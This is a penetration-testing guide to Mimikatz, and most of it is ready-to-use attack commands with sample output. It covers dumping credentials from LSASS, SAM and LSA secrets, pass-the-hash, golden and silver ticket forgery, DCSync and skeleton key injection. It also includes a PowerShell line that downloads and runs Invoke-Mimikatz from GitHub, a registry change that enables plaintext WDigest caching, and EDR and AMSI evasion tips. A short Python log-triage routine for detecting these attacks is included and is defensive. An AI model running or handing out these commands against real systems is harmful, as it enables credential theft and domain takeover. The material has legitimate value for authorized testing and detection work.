
Mimikatz
Comprehensive guide to Mimikatz for credential extraction, pass-the-hash, Kerberos attacks, and Windows post-exploitation techniques.
Introduction
Mimikatz is a powerful post-exploitation tool for extracting credentials from Windows memory. Created by Benjamin Delpy, it has become essential for penetration testers and red teamers working in Windows environments. Mimikatz can extract plaintext passwords, hashes, PIN codes, and Kerberos tickets from memory.
Detection Warning
Mimikatz is heavily signatured by antivirus and EDR solutions. In modern engagements, consider alternatives like:
- Invoke-Mimikatz - PowerShell version
- SafetyKatz - .NET implementation
- SharpKatz - C# port
- pypykatz - Python implementation (works on LSASS dumps offline)
Getting Started
Prerequisites
Most Mimikatz operations require elevated privileges:
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # token::elevate
Token Id : 0
User name : NT AUTHORITY\SYSTEM
Module Overview
| Module | Description |
|---|---|
| sekurlsa | Extract passwords, keys, tickets from LSASS |
| kerberos | Kerberos ticket manipulation |
| lsadump | LSA secrets, SAM, cached credentials |
| vault | Windows Vault passwords |
| crypto | Certificate and key operations |
| token | Token manipulation |
| process | Process manipulation and injection |
Credential Extraction
Dump Logon Passwords
mimikatz # sekurlsa::logonpasswords
Authentication Id : 0 ; 515764 (00000000:0007df34)
Session : Interactive from 1
User Name : Administrator
Domain : CORP
Logon Server : DC01
msv :
[00000003] Primary
* Username : Administrator
* Domain : CORP
* NTLM : cc36cf7a8514893efccd332446158b1a
* SHA1 : a299912f3dc7cf0023aef8e4361abfc03e9a8c30
wdigest :
* Username : Administrator
* Domain : CORP
* Password : P@ssw0rd123!
Dump SAM Database
mimikatz # lsadump::sam
RID : 000001f4 (500)
User : Administrator
Hash NTLM: cc36cf7a8514893efccd332446158b1a
RID : 000001f5 (501)
User : Guest
Dump LSA Secrets
mimikatz # lsadump::secrets
Secret : DefaultPassword
cur/text: ServiceAccountP@ss!
Dump Cached Domain Credentials
mimikatz # lsadump::cache
User : CORP\jsmith
MsCacheV2 : $DCC2$10240#jsmith#a1b2c3d4e5f6...
Extract from LSASS Dump
mimikatz # sekurlsa::minidump lsass.dmp
mimikatz # sekurlsa::logonpasswords
Pass-the-Hash
Execute commands using an NTLM hash without knowing the password:
mimikatz # sekurlsa::pth /user:Administrator /domain:corp.local /ntlm:cc36cf7a8514893efccd332446158b1a /run:cmd.exe
With AES Keys
mimikatz # sekurlsa::pth /user:Administrator /domain:corp.local /aes256:b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9
Kerberos Attacks
Export Tickets
mimikatz # sekurlsa::tickets /export
# List current tickets
mimikatz # kerberos::list
# Purge tickets
mimikatz # kerberos::purge
Pass-the-Ticket
mimikatz # kerberos::ptt ticket.kirbi
# Verify
mimikatz # kerberos::list
Golden Ticket
Create a forged TGT with the krbtgt hash:
# First, get krbtgt hash via DCSync
mimikatz # lsadump::dcsync /user:corp\krbtgt
# Create golden ticket
mimikatz # kerberos::golden /user:Administrator /domain:corp.local /sid:S-1-5-21-1234567890-1234567890-1234567890 /krbtgt:cc36cf7a8514893efccd332446158b1a /id:500 /ptt
# Open command prompt with ticket
mimikatz # misc::cmd
Silver Ticket
Create a forged service ticket:
mimikatz # kerberos::golden /user:Administrator /domain:corp.local /sid:S-1-5-21-1234567890-1234567890-1234567890 /target:sql01.corp.local /service:MSSQLSvc /rc4:cc36cf7a8514893efccd332446158b1a /ptt
DCSync Attack
Replicate credentials from a Domain Controller:
mimikatz # lsadump::dcsync /user:corp\Administrator
mimikatz # lsadump::dcsync /user:corp\krbtgt
mimikatz # lsadump::dcsync /all /csv
Requirements (the account used must hold these rights on the domain object):
- Replicating Directory Changes
- Replicating Directory Changes All
- Replicating Directory Changes in Filtered Set
Skeleton Key
Inject a master password into LSASS so that it is accepted for any account alongside the real password:
mimikatz # privilege::debug
mimikatz # misc::skeleton
# Now authenticate to any account with password "mimikatz"
net use \\dc01\admin$ /user:Administrator mimikatz
PowerShell (Invoke-Mimikatz)
PowerSploit Archived
PowerSploit is no longer actively maintained. Consider using SharpKatz, SafetyKatz, or pypykatz for maintained alternatives.
# Load Mimikatz in memory (PowerSploit - archived)
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1')
# Dump credentials
Invoke-Mimikatz -Command '"sekurlsa::logonpasswords"'
# DCSync
Invoke-Mimikatz -Command '"lsadump::dcsync /user:CORP\Administrator"'
# Golden ticket
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:corp.local /sid:S-1-5-21-... /krbtgt:HASH /ptt"'
# Pass-the-hash
Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:corp.local /ntlm:HASH /run:powershell.exe"'
WDigest Credential Caching
Enable plaintext password storage (the user has to re-authenticate before the value appears in memory):
# Enable WDigest
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
# Requires lock/unlock or logoff/logon to take effect
Common One-Liners
# Full credential dump
mimikatz # privilege::debug
mimikatz # token::elevate
mimikatz # sekurlsa::logonpasswords
mimikatz # lsadump::sam
mimikatz # vault::cred
mimikatz # vault::list
# Kerberos tickets
mimikatz # sekurlsa::tickets /export
mimikatz # kerberos::list /export
# Pass-the-hash
mimikatz # sekurlsa::pth /user:Admin /domain:CORP /ntlm:HASH /run:cmd
# DCSync all
mimikatz # lsadump::dcsync /domain:corp.local /all /csv
Detection and Evasion
Common Detection Points
- LSASS memory access
- Suspicious process creation patterns
- Known Mimikatz signatures in memory
- DCSync replication traffic
- Kerberos ticket anomalies
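As an added example (not part of this page or the Mimikatz project), a Python triage routine that applies three of the detection points above to constructed log events: LSASS read access (Sysmon Event ID 10), the three replication rights listed under the DCSync requirements appearing in Security Event ID 4662 for a non-DC account, and the WDigest UseLogonCredential registry change (Sysmon Event ID 13). The field names follow the Sysmon and Security-log schemas; the allowlist and the sample events are assumptions constructed for the demo.

```python
import re
# Control-access-right GUIDs for the three replication permissions DCSync needs.
DCSYNC_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
    "89e95b76-444d-4c62-991a-0facbeda640c",  # DS-Replication-Get-Changes-In-Filtered-Set
}
PROCESS_VM_READ = 0x0010  # access-mask bit needed to read LSASS memory (0x1010 = this + query)
GUID_RE = re.compile(r"[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}")
# Assumed allowlist of images that legitimately open LSASS on this host (tune per environment).
LSASS_READERS_OK = {r"c:\windows\system32\csrss.exe", r"c:\windows\system32\wininit.exe"}

def triage(ev):
    """Return finding strings for one event dict; empty list when nothing matches."""
    eid, findings = ev.get("EventID"), []
    if eid == 10 and ev.get("TargetImage", "").lower().endswith(r"\lsass.exe"):
        granted = int(ev.get("GrantedAccess", "0x0"), 16)
        src = ev.get("SourceImage", "").lower()
        if granted & PROCESS_VM_READ and src not in LSASS_READERS_OK:
            findings.append(f"lsass_read:{src}:{hex(granted)}")
    elif eid == 4662:
        rights = set(GUID_RE.findall(ev.get("Properties", "").lower()))
        user = ev.get("SubjectUserName", "")
        # Domain controller computer accounts (name ends in $) replicate legitimately.
        if rights & DCSYNC_GUIDS and not user.endswith("$"):
            findings.append(f"dcsync:{user}")
    elif eid == 13 and ev.get("TargetObject", "").lower().endswith(r"\wdigest\uselogoncredential"):
        if "0x00000001" in ev.get("Details", ""):  # Sysmon renders DWORD values this way
            findings.append("wdigest_plaintext_enabled")
    return findings

def triage_all(events):
    return [f for ev in events for f in triage(ev)]

# Constructed sample events; values are illustrative, not real telemetry.
SAMPLE_EVENTS = [
    {"EventID": 10, "SourceImage": r"C:\Users\jsmith\mimikatz.exe",
     "TargetImage": r"C:\Windows\system32\lsass.exe", "GrantedAccess": "0x1010"},
    {"EventID": 10, "SourceImage": r"C:\Windows\system32\csrss.exe",
     "TargetImage": r"C:\Windows\system32\lsass.exe", "GrantedAccess": "0x1fffff"},
    {"EventID": 4662, "SubjectUserName": "jsmith",
     "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "DC02$",
     "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 13, "Details": "DWORD (0x00000001)", "TargetObject":
     r"HKLM\System\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential"},
]

if __name__ == "__main__":
    for finding in triage_all(SAMPLE_EVENTS):
        print(finding)
```

Only the three events that match the page's detection points produce findings; the allowlisted csrss.exe access and the DC computer account's replication are dropped.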
Evasion Techniques
- Use obfuscated versions (Invoke-Mimikatz with AMSI bypass)
- Dump LSASS to disk and analyze offline with pypykatz
- Use direct syscalls to avoid API hooks
- Load from memory without touching disk
Related Resources
- Kerberoasting - Service ticket attacks
- Pass-the-Hash - NTLM relay and reuse
- BloodHound - Attack path discovery
- Impacket - Python-based alternatives
References
MITRE ATT&CK Techniques
- T1003.001 - OS Credential Dumping: LSASS Memory - sekurlsa::logonpasswords
- T1003.002 - OS Credential Dumping: Security Account Manager - lsadump::sam
- T1003.003 - OS Credential Dumping: NTDS - lsadump::dcsync
- T1003.004 - OS Credential Dumping: LSA Secrets - lsadump::secrets
- T1003.005 - OS Credential Dumping: Cached Domain Credentials - lsadump::cache
- T1558.001 - Steal or Forge Kerberos Tickets: Golden Ticket - kerberos::golden
- T1558.002 - Steal or Forge Kerberos Tickets: Silver Ticket - Service ticket forgery
- T1550.002 - Use Alternate Authentication Material: Pass the Hash - sekurlsa::pth
- T1550.003 - Use Alternate Authentication Material: Pass the Ticket - kerberos::ptt
- T1556.001 - Modify Authentication Process: Domain Controller Authentication - misc::skeleton
Official Documentation
- Mimikatz GitHub - Official repository
- Mimikatz Wiki - Command documentation
Security Resources
- ADSecurity Mimikatz Guide - Comprehensive usage guide
- HackTricks: Mimikatz - Attack techniques
Alternative Tools
- pypykatz - Python implementation for offline analysis
- SharpKatz - C# port
- SafetyKatz - .NET version with reflective loading